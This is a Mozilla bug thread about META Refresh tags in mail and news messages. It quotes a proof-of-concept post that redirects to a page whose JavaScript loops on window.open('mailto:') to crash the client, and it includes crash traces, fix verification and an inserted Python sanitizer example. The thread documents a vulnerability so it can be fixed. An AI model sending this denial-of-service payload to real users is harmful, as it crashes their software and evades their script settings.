Closed Bug 28612 Opened 25 years ago Closed 25 years ago

META Refresh allowed in Mail/News

Categories

(MailNews Core :: Security, defect, P3)

x86
Windows 98
defect

Tracking

(Not tracked)

VERIFIED FIXED

People

(Reporter: icos, Assigned: norrisboyd)

Details

(Whiteboard: [PDT+])

A recent post by Jerry Baker to Netscape.public.mozilla.seamonkey brought to my attention a serious flaw in Communicator and Seamonkey: META Refresh tags are allowed in newsgroup and email messages. This is a big security hazard. Here is the source of Jerry Baker's message.

--begin--
Path: secnews.netscape.com!not-for-mail
From: Jerry Baker <jbaker6953@yahoo.com>
Newsgroups: netscape.public.mozilla.seamonkey
Subject: Re: Related to "Mail reader allows spammers to set cookies to track web usage"
Date: Sun, 20 Feb 2000 09:57:16 -0800
Organization: Another Netscape Collabra Server User
Lines: 20
Message-ID: <38B02AFC.315FB2B@weirdness.com>
References: <38B02236.13D10AE8@weirdness.com>
NNTP-Posting-Host: lsanca1-ar3-145-172.dsl.gtei.net
Mime-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 4.71 [en] (WinNT; U)
X-Accept-Language: en

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<meta http-equiv="Refresh" content="0;url=http://www.cadcamcomputers.com/jerry/mailto_dos.html">
Jerry Baker wrote:
<blockquote TYPE=CITE>Even more annoying is the potential DOS's that can be caused by calling
<br>HTTP url's from mail and news. Read the next post by me in this thread
<br>with caution.
<p>--
<br>Jerry Baker
<p>"I'm too sexy for my code." - Awk Sed Fred.</blockquote>
<p><br><b>Netscape</b> will now die. If Mozilla does not, an equally silly DOS can be made for Mozilla.
<p>--
<br>Jerry Baker
<p>"I'm too sexy for my code." - Awk Sed Fred.
<br>&nbsp;</html>
--end--

This message opens up a url (http://www.cadcamcomputers.com/jerry/mailto_dos.html) that contains this code.

--begin JS code--
function stackattack() {
    while (true) {
        msgWindow = window.open("mailto:", "DisplayWindow", "toolbar=no,directories=no,menubar=no");
    }
}
--end JS code--

Once you open this message, your browser will be flooded with new "Composition" windows until you run out of memory, Netscape crashes, and makes your system unstable.
I reproduced this on Mozilla Feb 19 build, and Communicator 4.61. This is a perfect sneak around the "Enable JavaScript for Mail and News" option in the Advanced section of preferences. As long as META REFRESH is around in mail/news messages, you may as well leave this option out of preferences! I propose that when "Enable JavaScript for Mail and News" is DISABLED, all META REFRESH tags are disabled, too. When present and allowed to execute, it poses a SERIOUS risk for malicious content.
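The report above describes the core problem from the mail client's side: an HTML message carrying a `<meta http-equiv="Refresh">` tag causes the reader to navigate to an arbitrary URL without any script running, so the JavaScript preference offers no protection. The following is an added example, not Mozilla's fix and not code from the bug, showing what the proposed mitigation looks like in a mail renderer's pre-processing step: parse the raw RFC 822 message, and if the body is text/html, strip meta refresh tags (or, when refresh is explicitly allowed, let them through) while recording the URL each one pointed at, so the reader can log or warn on it. The message text, the `example.invalid` URL, and the function names `sanitize_html` and `sanitize_message` are constructed for this example.

```python
"""Added example: neutralise <meta http-equiv="refresh"> in HTML mail/news
bodies before they are rendered, mirroring the mitigation proposed in the bug.
Not Mozilla's code; the sample message and names are constructed here."""
import email
import re
from email import policy
from html.parser import HTMLParser

# Constructed sample modelled on the message quoted in the report: a single-part
# text/html news article whose only active content is a meta refresh.
SAMPLE_MESSAGE = """\
From: Sender <sender@example.invalid>
Newsgroups: netscape.public.test
Subject: This should not navigate anywhere
Mime-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<meta http-equiv="Refresh" content="0;url=http://example.invalid/page.html">
<p>Harmless looking text.</p>
</html>
"""

# Extracts the URL part of a refresh directive such as "0;url=http://..."
# (seconds, semicolon, optional whitespace, url=, optional quotes).
_REFRESH_URL = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"]*)", re.I)


class MetaRefreshFilter(HTMLParser):
    """Re-emits the HTML it is fed, minus meta refresh tags, and records
    the target of every refresh it saw (kept or dropped)."""

    def __init__(self, allow_refresh=False):
        # convert_charrefs=False so entities are passed through untouched.
        super().__init__(convert_charrefs=False)
        self.allow_refresh = allow_refresh
        self.out = []
        self.refresh_targets = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names.
        if tag == "meta":
            a = {k: (v or "") for k, v in attrs}
            if a.get("http-equiv", "").strip().lower() == "refresh":
                content = a.get("content", "")
                m = _REFRESH_URL.search(content)
                self.refresh_targets.append(m.group(1).strip() if m else content)
                if not self.allow_refresh:
                    return  # drop the tag: nothing is emitted for it
        self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        # "<br/>"-style tags: raw text already contains the slash.
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")

    def handle_pi(self, data):
        self.out.append(f"<?{data}>")


def sanitize_html(html, allow_refresh=False):
    """Return (filtered_html, refresh_targets) for an HTML body."""
    f = MetaRefreshFilter(allow_refresh=allow_refresh)
    f.feed(html)
    f.close()
    return "".join(f.out), f.refresh_targets


def sanitize_message(raw, allow_refresh=False):
    """Parse a raw RFC 822 message. For a text/html body return the filtered
    HTML and the refresh targets found; for anything else return (None, [])."""
    msg = email.message_from_string(raw, policy=policy.default)
    if msg.get_content_type() != "text/html":
        return None, []
    return sanitize_html(msg.get_content(), allow_refresh=allow_refresh)


if __name__ == "__main__":
    safe, targets = sanitize_message(SAMPLE_MESSAGE)
    print("refresh targets neutralised:", targets)
    print(safe)
```

The `allow_refresh` flag is where the reporter's proposal plugs in: a client would pass the value of its "Enable JavaScript for Mail and News" preference (or simply never allow refresh in mail at all), and the returned target list gives the reader something to log or display instead of silently navigating.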
Reassign to back end (not crypto related).
Assignee: jefft → phil
Component: Security → Back End
Switching back to security which is way more than just crypto, especially since the mail product doesn't even do encryption at this point. Maybe when S/MIME is implemented we can split the security component into "Security: General" and "Security: S/MIME" (see the browser product, with 3 security categories). DOS attacks definitely fall under "security" of one form or another.
Component: Back End → Security
I'll take it.
Assignee: phil → norris
Bulk moving all MailNews Security bugs to new Security: General component. The previous Security component for MailNews will be deleted.
Component: Security → Security: General
Status: NEW → ASSIGNED
Keywords: beta1
Whiteboard: fix available
Target Milestone: M14
Whiteboard: fix available → [PDT+]fix available
Fix checked in.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
par, can you help me verify this?
QA Contact: lchiang → ppandit
Norris modified 10 files for this bug. I will test using a debug and a commercial build tomorrow. Par
Tried verifying, but someone deleted the original newsgroup message. I tried posting an exact copy, but instead of the message containing Content-Type: text/html; charset=us-ascii, view->source tells me that it's Content-Type: text/plain; charset=us-ascii
On Windows NT 4.0, tested today using commercial build and debug build. Using a commercial build, I load the http://www.cadcamcomputers.com/jerry/mailto_dos.html. The CPU immediately goes to 100% and stays there. The application is not usable. When I killed the application from the task bar, the debug window indicated there were over 210 Webshells. Next I started the debug build with the C++ editor. Went to the same URL and this time did a break. Got the following error message and the trace.

Unhandled exception in mozilla.exe (MSVCRDT.DLL) 0xC0000005 Access Violation

__sbh_free_block(tagHeader * 0x0a7c3294, void * 0x0d7d8920) line 350 + 6 bytes
_realloc_base(void * 0x0d7d8920, unsigned int 596) line 101 + 13 bytes
realloc_help(void * 0x0d7d8940, unsigned int 560, int 1, const char * 0x00000000, int 0, int 1) line 636 + 16 bytes
_realloc_dbg(void * 0x0d7d8940, unsigned int 560, int 1, const char * 0x00000000, int 0) line 806 + 27 bytes
realloc(void * 0x0d7d8940, unsigned int 560) line 755 + 19 bytes
JS_realloc(JSContext * 0x0d7d75a0, void * 0x0d7d8940, unsigned int 560) line 1032 + 14 bytes
js_AllocSlot(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, unsigned long * 0x0012bed0) line 1422 + 20 bytes
js_NewScopeProperty(JSContext * 0x0d7d75a0, JSScope * 0x0d7d7520, long 25329248, int (JSContext *, JSObject *, long, long *)* 0x00497d40 GetWindowProperty(JSContext *, JSObject *, long, long *), int (JSContext *, JSObject *, long, long *)* 0x00499ba0 SetWindowProperty(JSContext *, JSObject *, long, long *), unsigned int 0) line 458 + 20 bytes
js_DefineProperty(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, long 25329248, long 204328752, int (JSContext *, JSObject *, long, long *)* 0x00497d40 GetWindowProperty(JSContext *, JSObject *, long, long *), int (JSContext *, JSObject *, long, long *)* 0x00499ba0 SetWindowProperty(JSContext *, JSObject *, long, long *), unsigned int 0, JSProperty * * 0x00000000) line 1576 + 29 by
js_DefineFunction(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, JSAtom * 0x01827e60, int (JSContext *, JSObject *, unsigned int, long *, long *)* 0x00314948 str_uneval(JSContext *, JSObject *, unsigned int, long *, long *), unsigned int 1, unsigned int 0) line 1646 + 40 bytes
JS_DefineFunction(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, const char * 0x0033f594, int (JSContext *, JSObject *, unsigned int, long *, long *)* 0x00314948 str_uneval(JSContext *, JSObject *, unsigned int, long *, long *), unsigned int 1, unsigned int 0) line 2252 + 29 bytes
JS_DefineFunctions(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568, JSFunctionSpec * 0x0033f328) line 2234 + 44 bytes
js_InitStringClass(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568) line 2159 + 18 bytes
JS_InitStandardClasses(JSContext * 0x0d7d75a0, JSObject * 0x0c2a0568) line 1002 + 129 bytes
nsJSContext::InitContext(nsJSContext * const 0x0d7d7730, nsIScriptGlobalObject * 0x0d7d7794) line 645 + 30 bytes
NS_CreateScriptContext(nsIScriptGlobalObject * 0x0d7d7794, nsIScriptContext * * 0x0d7d3800) line 916
nsDocShell::EnsureScriptEnvironment(nsDocShell * const 0x0d7d3770) line 1711 + 50 bytes
nsWebShell::GetInterface(nsWebShell * const 0x0d7d3790, const nsID & {...}, void * * 0x0012c110) line 804 + 16 bytes
nsGetInterface::operator()(const nsID & {...}, void * * 0x0012c110) line 37 + 31 bytes
nsCOMPtr<nsIScriptGlobalObject>::assign_from_helper(const nsCOMPtr_helper & {...}, const nsID & {...}) line 795 + 18 bytes
nsCOMPtr<nsIScriptGlobalObject>::nsCOMPtr<nsIScriptGlobalObject>(const nsCOMPtr_helper & {...}) line 498
GlobalWindowImpl::ReadyOpenedDocShellItem(GlobalWindowImpl * const 0x01ef5530, nsIDocShellTreeItem * 0x0d7d3774, nsIDOMWindow * * 0x0012c5cc) line 2717 + 27 bytes
GlobalWindowImpl::OpenInternal(GlobalWindowImpl * const 0x01ef5530, JSContext * 0x01ef09b0, long * 0x08bcdfe0, unsigned int 4, int 1, nsIDOMWindow * * 0x0012c5cc) line 2371 + 25 bytes
GlobalWindowImpl::OpenDialog(GlobalWindowImpl * const 0x01ef5538, JSContext * 0x01ef09b0, long * 0x08bcdfe0, unsigned int 4, nsIDOMWindow * * 0x0012c5cc) line 1520
openWindow(const unsigned short * 0x0d7d2150, const unsigned short * 0x0012c640) line 83 + 60 bytes
nsMsgComposeService::OpenComposeWindowWithCompFields(nsMsgComposeService * const 0x0d7d2d20, const unsigned short * 0x00000000, int 8, int 0, nsIMsgCompFields * 0x0d7d23a0, nsIMsgIdentity * 0x00000000) line 287 + 46 bytes
nsMsgComposeService::OpenComposeWindowWithValues(nsMsgComposeService * const 0x0d7d2d20, const unsigned short * 0x00000000, int 8, int 0, const unsigned short * 0x0012c78c, const unsigned short * 0x0012c98c, const unsigned short * 0x0012c8cc, const unsigned short * 0x0012c824, const unsigned short * 0x0012ca24, const unsigned short * 0x0012cabc, const unsigned short * ...) line 248
nsMsgComposeService::OpenComposeWindowWithURI(nsMsgComposeService * const 0x0d7d2d20, const unsigned short * 0x00000000, nsIURI * 0x0d7d2e74) line 213 + 118 bytes
nsMsgComposeService::HandleContent(nsMsgComposeService * const 0x0d7d2d24, const char * 0x0d7d29d0, const char * 0x01a6d270, const char * 0x10083548 gCommonEmptyBuffer, nsIChannel * 0x0d7d2b30) line 364 + 27 bytes
nsURILoader::DispatchContent(nsURILoader * const 0x01850390, const char * 0x0d7d29d0, int 0, const char * 0x10083548 gCommonEmptyBuffer, nsIChannel * 0x0d7d2b30, nsISupports * 0x00000000, nsIURIContentListener * 0x09e3aeec, char * * 0x0012cda8, nsIURIContentListener * * 0x0012cdb0, int * 0x0012cda0) line 757 + 49 bytes
nsDocumentOpenInfo::DispatchContent(nsIChannel * 0x0d7d2b30, nsISupports * 0x00000000) line 303 + 150 bytes
nsDocumentOpenInfo::OnStartRequest(nsDocumentOpenInfo * const 0x0d7d2d60, nsIChannel * 0x0d7d2b30, nsISupports * 0x00000000) line 248 + 16 bytes
nsMailtoChannel::AsyncRead(nsMailtoChannel * const 0x0d7d2b30, unsigned int 0, int -1, nsISupports * 0x00000000, nsIStreamListener * 0x0d7d2d60) line 326
nsDocumentOpenInfo::Open(nsIChannel * 0x0d7d2b30, int 0, const char * 0x00000000, nsISupports * 0x09e3aed0) line 241 + 22 bytes
nsURILoader::OpenURIVia(nsURILoader * const 0x01850390, nsIChannel * 0x0d7d2b30, int 0, const char * 0x00000000, nsISupports * 0x09e3aed0, unsigned int 0) line 567 + 29 bytes
nsURILoader::OpenURI(nsURILoader * const 0x01850390, nsIChannel * 0x0d7d2b30, int 0, const char * 0x00000000, nsISupports * 0x09e3aed0) line 487
nsWebShell::DoLoadURL(nsIURI * 0x0d7d2e74, const char * 0x00380fcc, nsIInputStream * 0x00000000, unsigned int 0, const unsigned int 0, const unsigned short * 0x0012d9f4, const char * 0x00000000, int 1) line 1699 + 104 bytes
nsWebShell::LoadURI(nsWebShell * const 0x09e3aed0, nsIURI * 0x0d7d2e74, const char * 0x00380fcc, nsIInputStream * 0x00000000, int 1, unsigned int 0, const unsigned int 0, nsISupports * 0x00000000, const unsigned short * 0x0012d9f4, const char * 0x00000000) line 1981 + 44 bytes
nsWebShell::LoadURL(nsWebShell * const 0x09e3aed0, const unsigned short * 0x0012dc14, const char * 0x00380fcc, nsIInputStream * 0x00000000, int 1, unsigned int 0, const unsigned int 0, nsISupports * 0x00000000, const unsigned short * 0x0012d9f4, const char * 0x00000000) line 2205 + 53 bytes
nsWebShell::LoadURL(nsWebShell * const 0x09e3aed0, const unsigned short * 0x0012dc14, nsIInputStream * 0x00000000, int 1, unsigned int 0, const unsigned int 0, nsISupports * 0x00000000, const unsigned short * 0x0012d9f4) line 1438
GlobalWindowImpl::OpenInternal(GlobalWindowImpl * const 0x0806c7e0, JSContext * 0x0806a400, long * 0x08dadfe8, unsigned int 3, int 0, nsIDOMWindow * * 0x0012dd10) line 2414
GlobalWindowImpl::Open(GlobalWindowImpl * const 0x0806c7e8, JSContext * 0x0806a400, long * 0x08dadfe8, unsigned int 3, nsIDOMWindow * * 0x0012dd10) line 1512
WindowOpen(JSContext * 0x0806a400, JSObject * 0x00f367a0, unsigned int 3, long * 0x08dadfe8, long * 0x0012ddd0) line 2558 + 31 bytes
js_Invoke(JSContext * 0x0806a400, unsigned int 3, unsigned int 0) line 665 + 26 bytes
js_Interpret(JSContext * 0x0806a400, long * 0x0012e6bc) line 2292 + 15 bytes
js_Invoke(JSContext * 0x0806a400, unsigned int 0, unsigned int 0) line 681 + 13 bytes
js_Interpret(JSContext * 0x0806a400, long * 0x0012ef64) line 2292 + 15 bytes
js_Invoke(JSContext * 0x0806a400, unsigned int 1, unsigned int 2) line 681 + 13 bytes
js_InternalInvoke(JSContext * 0x0806a400, JSObject * 0x00f367a0, long 118062744, unsigned int 0, unsigned int 1, long * 0x0012f0f0, long * 0x0012f09c) line 754 + 19 bytes
JS_CallFunctionValue(JSContext * 0x0806a400, JSObject * 0x00f367a0, long 118062744, unsigned int 1, long * 0x0012f0f0, long * 0x0012f09c) line 2787 + 31 bytes
nsJSContext::CallEventHandler(nsJSContext * const 0x0806a670, void * 0x00f367a0, void * 0x07097e98, unsigned int 1, void * 0x0012f0f0, int * 0x0012f0ec) line 562 + 33 bytes
nsJSEventListener::HandleEvent(nsIDOMEvent * 0x081f9c74) line 128 + 57 bytes
nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x080b06a0, nsIDOMEvent * 0x081f9c74, unsigned int 1, unsigned int 7) line 697 + 19 bytes
nsEventListenerManager::HandleEvent(nsIPresContext * 0x09e10680, nsEvent * 0x0012fbac, nsIDOMEvent * * 0x0012f504, unsigned int 7, nsEventStatus * 0x0012fbec) line 1248 + 35 bytes
GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x0806c7e4, nsIPresContext * 0x09e10680, nsEvent * 0x0012fbac, nsIDOMEvent * * 0x0012f504, unsigned int 1, nsEventStatus * 0x0012fbec) line 376
nsWebShell::OnEndDocumentLoad(nsWebShell * const 0x08078ee0, nsIDocumentLoader * 0x08079960, nsIChannel * 0x09e22c30, unsigned int 0) line 2954 + 51 bytes
nsDocLoaderImpl::FireOnEndDocumentLoad(nsDocLoaderImpl * 0x08079960, nsIChannel * 0x09e22c30, unsigned int 0) line 603
nsDocLoaderImpl::DocLoaderIsEmpty(unsigned int 0) line 494
nsDocLoaderImpl::OnStopRequest(nsDocLoaderImpl * const 0x08079964, nsIChannel * 0x09e22c30, nsISupports * 0x00000000, unsigned int 0, const unsigned short * 0x00000000) line 438
nsLoadGroup::RemoveChannel(nsLoadGroup * const 0x08079900, nsIChannel * 0x09e22c30, nsISupports * 0x00000000, unsigned int 0, const unsigned short * 0x00000000) line 535 + 42 bytes
nsHTTPChannel::ResponseCompleted(nsIChannel * 0x09de91b4, nsIStreamListener * 0x09e119a0, unsigned int 0, const unsigned short * 0x00000000) line 1361
nsHTTPResponseListener::OnStopRequest(nsHTTPResponseListener * const 0x09e10e00, nsIChannel * 0x09de91b4, nsISupports * 0x09e22c30, unsigned int 0, const unsigned short * 0x00000000) line 260
nsOnStopRequestEvent::HandleEvent(nsOnStopRequestEvent * const 0x09e12c40) line 283
nsStreamListenerEvent::HandlePLEvent(PLEvent * 0x09e12bf0) line 97 + 12 bytes
PL_HandleEvent(PLEvent * 0x09e12bf0) line 526 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x01009e30) line 487 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x001201be, unsigned int 49356, unsigned int 0, long 16817712) line 975 + 9 bytes
USER32! 77e71820()
01009e30()
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
ppandit, this bug doesn't have to do with whether http://www.cadcamcomputers.com/jerry/mailto_dos.html causes a crash or not, it has to do with whether a META REFRESH tag within a newsgroup or mail message can cause a URL (such as that) to automatically open. build 2000022408 (win32) still opens up this URL when visiting the newsgroup message in netscape.public.test titled "This should crash" (last message posted by yours truly, Andrew Niese) so, this is not fixed.
> this bug doesn't have to do with whether
> http://www.cadcamcomputers.com/jerry/mailto_dos.html causes a crash or not

FYI: I didn't read the previous comments carefully enough or not at all, thought the URL would show a /description/ of the attack, not the attack itself, and opened it. 4.7 Linux is vulnerable and also caused my window manager to crash.
A browser-only, but related and interesting bug in 4.7: If I didn't overlook something, I was able to close all related windows (i.e. the window, which loaded the URL, the (browser) window etc.), but the attack didn't stop. The attacking (new) browser window came up again and again. I was not able to reproduce this bug (executing REFRESHs for windows, which don't exist anymore) with Mozilla 2000-02-17, because no new windows were opened at all, just lots of |webshell += <count>|'s on the console. If a similar bug exists in Mozilla, I'd like to file a bug on this.
Verified fixed on 2/27 (win32) build. Great work! Can someone PLEASE send this bugzilla URL to someone who does bugfixes for Netscape Communicator 4.x? If there are any further releases of 4.x, then this should be addressed, if possible.
Status: REOPENED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verifying.
Status: RESOLVED → VERIFIED
Using Windows commercial build from 2/28, I am getting the same issue as before. CPU is at 100% after loading the URL. The application is basically unusable. Looks like we prevent multiple windows from coming up, but if the application cannot do anything now, is it really a fix? Was any code checked in?
ppandit, did you load the URL in the browser or did you open the example msg in Mailnews? This bug is about the latter.
Whiteboard: [PDT+]fix available → [PDT+]
Okay, I tried the sample message from the newsgroup with today's debug mozilla.build and had no problem. I agree with the VERIFIED status.
Product: MailNews → Core
Product: Core → MailNews Core